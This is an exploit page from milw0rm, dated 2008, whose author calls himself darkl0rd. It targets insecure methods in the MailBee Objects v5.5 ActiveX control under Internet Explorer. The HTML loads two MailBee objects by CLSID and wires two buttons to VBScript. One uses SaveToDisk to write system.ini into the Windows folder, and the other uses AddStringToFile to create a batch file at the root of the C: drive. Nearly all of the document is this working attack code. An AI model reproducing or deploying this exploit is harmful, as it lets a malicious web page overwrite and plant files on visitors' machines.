<body bgcolor="#000000">
<div align="center">
<pre><code><span style="font: 10pt verdana;"><font color="#00FF00">=======================================================================</font>
</div><center>
<font face="Verdana" color="#00FF00"><b>MailBee Objects v5.5 (MailBee.dll) Insecure Method</b><br>
Web site : <a href="http://www.afterlogic.com/"><font color="#00FF00">http://www.afterlogic.com/</font></a></font><br><font face="Verdana" color="#00FF00">
=======================================================================</font><font face="Verdana" color="#00FF00">
</font></span><font color="#00FF00"><br><span style="font-style:normal; font-variant:normal; font-size:10pt; font-family:Verdana; font-weight:700">Author: darkl0rd
<br>E-mail: l_l_darkl0rd_l_l@yahoo.com</span></font><br><font color="#00FF00"><span style="font-style:normal; font-variant:normal; font-weight:normal; font-size:10pt; font-family:Verdana">
Tested on Windows XP Professional SP2 , with Internet Explorer 6
</span></font></center>
<div align="left"><font color="#00FF00"><object classid='clsid:0A83F9E1-A8DD-459F-B98F-24295345AFA8' id='los'></object></font>
<object classid='clsid:4D007FEC-23CA-4DEF-869A-8776FAE266DB' id='over'></object>
</div><div align="center"><br><font color="#00FF00" face="Verdana">Save Files</font>
</div><center><span style="font: 10pt verdana;"><input language=VBScript onclick=evil() type=button value="Exploit [1]"></span> <font face="verdana" size="2" color="#00FF00"><br>Creat Files</font></center>
<center><input language=VBScript onclick=nice() type=button value='Exploit [2]'></center>
d'/<script language='vbscript'>
Sub evil
los.SaveToDisk ("c:\Windows\"),"system.ini"
MyMsg = MsgBox("Exploit completed!")
End Sub
Sub nice
mystr="start"
over.AddStringToFile "c:\darkl0rd.bat" ,mystr
MyMsg = MsgBox("Exploit completed!")
End Sub
</script>
</span></code></pre>
# milw0rm.com [2008-01-28]
